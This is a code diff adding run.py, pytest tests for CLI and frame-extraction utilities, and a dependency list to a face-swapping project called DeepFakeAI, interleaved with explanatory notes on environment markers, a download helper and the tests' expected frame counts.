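The four onnxruntime lines in requirements.txt are mutually exclusive through PEP 508 environment markers: pip evaluates each marker against the installing machine and keeps exactly one build. The evaluation can be checked with the `packaging` library (an assumption that it is installed; it ships alongside pip):

    from packaging.markers import Marker

    # True on an Apple Silicon Mac, where pip would select onnxruntime-silicon.
    silicon = Marker("sys_platform == 'darwin' and platform_machine == 'arm64'")
    print(silicon.evaluate())

    # True everywhere outside macOS, selecting onnxruntime-gpu instead.
    gpu = Marker("sys_platform != 'darwin'")
    print(gpu.evaluate())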
diff --git a/run.py b/run.py
new file mode 100644
index 0000000000000000000000000000000000000000..11500cdc86edf1a68cf1c53b78d4e7e01a6393c4
--- /dev/null
+++ b/run.py
@@ -0,0 +1,6 @@
+#!/usr/bin/env python3
+
+from DeepFakeAI import core
+
+if __name__ == '__main__':
+    core.run()
diff --git a/tests/__init__.py b/tests/__init__.py
new file mode 100644
index 0000000000000000000000000000000000000000..e69de29bb2d1d6434b8b29ae775ad8c2e48c5391
diff --git a/tests/test_cli.py b/tests/test_cli.py
new file mode 100644
index 0000000000000000000000000000000000000000..266116e302e19dd4602df71cbe4bd2440cf2513c
--- /dev/null
+++ b/tests/test_cli.py
@@ -0,0 +1,31 @@
+import subprocess
+import pytest
+
+from DeepFakeAI import wording
+from DeepFakeAI.utilities import conditional_download
+
+
+@pytest.fixture(scope = 'module', autouse = True)
+def before_all() -> None:
+    conditional_download('.assets/examples',
+    [
+        'https://github.com/DeepFakeAI/DeepFakeAI-assets/releases/download/examples/source.jpg',
+        'https://github.com/DeepFakeAI/DeepFakeAI-assets/releases/download/examples/target-1080p.mp4'
+    ])
+    subprocess.run([ 'ffmpeg', '-i', '.assets/examples/target-1080p.mp4', '-vframes', '1', '.assets/examples/target-1080p.jpg' ])
+
+
+def test_image_to_image() -> None:
+    commands = [ 'python', 'run.py', '-s', '.assets/examples/source.jpg', '-t', '.assets/examples/target-1080p.jpg', '-o', '.assets/examples' ]
+    run = subprocess.run(commands, stdout = subprocess.PIPE)
+
+    assert run.returncode == 0
+    assert wording.get('processing_image_succeed') in run.stdout.decode()
+
+
+def test_image_to_video() -> None:
+    commands = [ 'python', 'run.py', '-s', '.assets/examples/source.jpg', '-t', '.assets/examples/target-1080p.mp4', '-o', '.assets/examples', '--trim-frame-end', '10' ]
+    run = subprocess.run(commands, stdout = subprocess.PIPE)
+
+    assert run.returncode == 0
+    assert wording.get('processing_video_succeed') in run.stdout.decode()
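conditional_download comes from DeepFakeAI.utilities, whose body is not part of this diff; its call sites imply it creates the target directory and fetches only files that are not already present, so repeated test runs skip the download. Roughly, under those assumptions (a sketch, not the project's implementation):

    import os
    import urllib.request

    def conditional_download_sketch(download_directory_path, urls):
        os.makedirs(download_directory_path, exist_ok = True)
        for url in urls:
            download_file_path = os.path.join(download_directory_path, os.path.basename(url))
            if not os.path.exists(download_file_path):  # only fetch files that are missing
                urllib.request.urlretrieve(url, download_file_path)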
diff --git a/tests/test_utilities.py b/tests/test_utilities.py
new file mode 100644
index 0000000000000000000000000000000000000000..e503e74378796c8bf9c4d9d2f6bc077c4e593b39
--- /dev/null
+++ b/tests/test_utilities.py
@@ -0,0 +1,107 @@
+import glob
+import subprocess
+import pytest
+
+import DeepFakeAI.globals
+from DeepFakeAI.utilities import conditional_download, detect_fps, extract_frames, create_temp, get_temp_directory_path, clear_temp
+
+
+@pytest.fixture(scope = 'module', autouse = True)
+def before_all() -> None:
+    DeepFakeAI.globals.temp_frame_quality = 100
+    DeepFakeAI.globals.trim_frame_start = None
+    DeepFakeAI.globals.trim_frame_end = None
+    DeepFakeAI.globals.temp_frame_format = 'png'
+    conditional_download('.assets/examples',
+    [
+        'https://github.com/DeepFakeAI/DeepFakeAI-assets/releases/download/examples/target-240p.mp4'
+    ])
+    subprocess.run([ 'ffmpeg', '-i', '.assets/examples/target-240p.mp4', '-vf', 'fps=25', '.assets/examples/target-240p-25fps.mp4' ])
+    subprocess.run([ 'ffmpeg', '-i', '.assets/examples/target-240p.mp4', '-vf', 'fps=30', '.assets/examples/target-240p-30fps.mp4' ])
+    subprocess.run([ 'ffmpeg', '-i', '.assets/examples/target-240p.mp4', '-vf', 'fps=60', '.assets/examples/target-240p-60fps.mp4' ])
+
+
+@pytest.fixture(scope = 'function', autouse = True)
+def before_each() -> None:
+    DeepFakeAI.globals.trim_frame_start = None
+    DeepFakeAI.globals.trim_frame_end = None
+    DeepFakeAI.globals.temp_frame_quality = 90
+    DeepFakeAI.globals.temp_frame_format = 'jpg'
+
+
+def test_detect_fps() -> None:
+    assert detect_fps('.assets/examples/target-240p-25fps.mp4') == 25.0
+    assert detect_fps('.assets/examples/target-240p-30fps.mp4') == 30.0
+    assert detect_fps('.assets/examples/target-240p-60fps.mp4') == 60.0
+
+
+def test_extract_frames() -> None:
+    target_paths =\
+    [
+        '.assets/examples/target-240p-25fps.mp4',
+        '.assets/examples/target-240p-30fps.mp4',
+        '.assets/examples/target-240p-60fps.mp4'
+    ]
+    for target_path in target_paths:
+        temp_directory_path = get_temp_directory_path(target_path)
+        create_temp(target_path)
+
+        assert extract_frames(target_path, 30.0) is True
+        assert len(glob.glob1(temp_directory_path, '*.jpg')) == 324
+
+        clear_temp(target_path)
+
+
+def test_extract_frames_with_trim_start() -> None:
+    DeepFakeAI.globals.trim_frame_start = 224
+    data_provider =\
+    [
+        ('.assets/examples/target-240p-25fps.mp4', 55),
+        ('.assets/examples/target-240p-30fps.mp4', 100),
+        ('.assets/examples/target-240p-60fps.mp4', 212)
+    ]
+    for target_path, frame_total in data_provider:
+        temp_directory_path = get_temp_directory_path(target_path)
+        create_temp(target_path)
+
+        assert extract_frames(target_path, 30.0) is True
+        assert len(glob.glob1(temp_directory_path, '*.jpg')) == frame_total
+
+        clear_temp(target_path)
+
+
+def test_extract_frames_with_trim_start_and_trim_end() -> None:
+    DeepFakeAI.globals.trim_frame_start = 124
+    DeepFakeAI.globals.trim_frame_end = 224
+    data_provider =\
+    [
+        ('.assets/examples/target-240p-25fps.mp4', 120),
+        ('.assets/examples/target-240p-30fps.mp4', 100),
+        ('.assets/examples/target-240p-60fps.mp4', 50)
+    ]
+    for target_path, frame_total in data_provider:
+        temp_directory_path = get_temp_directory_path(target_path)
+        create_temp(target_path)
+
+        assert extract_frames(target_path, 30.0) is True
+        assert len(glob.glob1(temp_directory_path, '*.jpg')) == frame_total
+
+        clear_temp(target_path)
+
+
+def test_extract_frames_with_trim_end() -> None:
+    DeepFakeAI.globals.trim_frame_end = 100
+    data_provider =\
+    [
+        ('.assets/examples/target-240p-25fps.mp4', 120),
+        ('.assets/examples/target-240p-30fps.mp4', 100),
+        ('.assets/examples/target-240p-60fps.mp4', 50)
+    ]
+    for target_path, frame_total in data_provider:
+        temp_directory_path = get_temp_directory_path(target_path)
+        create_temp(target_path)
+
+        assert extract_frames(target_path, 30.0) is True
+        assert len(glob.glob1(temp_directory_path, '*.jpg')) == frame_total
+
+        clear_temp(target_path)
diff --git a/xyz.txt b/xyz.txt
new file mode 100644
index 0000000000000000000000000000000000000000..f381ae5dc8bd37823ff98638ff252be9bbce8eec
--- /dev/null
+++ b/xyz.txt
@@ -0,0 +1,11 @@
+insightface==0.7.3
+numpy==1.24.3
+onnx==1.14.0
+onnxruntime==1.15.1
+opencv-python==4.8.0.74
+opennsfw2==0.10.2
+protobuf==4.23.4
+pytest==7.4.0
+psutil==5.9.5
+tensorflow==2.13.0
+tqdm==4.65.0
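The expected frame totals in tests/test_utilities.py above all follow one relationship, inferred from the fixtures rather than from extract_frames' source (which is outside this diff): trim indices count frames at the clip's native fps, while extraction resamples to 30 fps, so the output count is the trimmed duration in seconds times 30. The untrimmed test expects 324 frames at 30 fps, fixing the clip length at 10.8 seconds. A quick arithmetic check of all nine expectations, using no project code:

    CLIP_SECONDS = 324 / 30.0  # 10.8 s, from the untrimmed test expecting 324 frames

    def expected_frames(native_fps, start_frame, end_frame):
        # trim indices are native-fps frame numbers; extraction resamples to 30 fps
        return int((end_frame - start_frame) / native_fps * 30.0)

    # trim_frame_start = 224 only: trim runs from frame 224 to the clip's native end
    for fps, total in ((25.0, 55), (30.0, 100), (60.0, 212)):
        assert expected_frames(fps, 224, fps * CLIP_SECONDS) == total

    # trim_frame_start = 124 and trim_frame_end = 224 (also matches the trim-end-only test)
    for fps, total in ((25.0, 120), (30.0, 100), (60.0, 50)):
        assert expected_frames(fps, 124, 224) == total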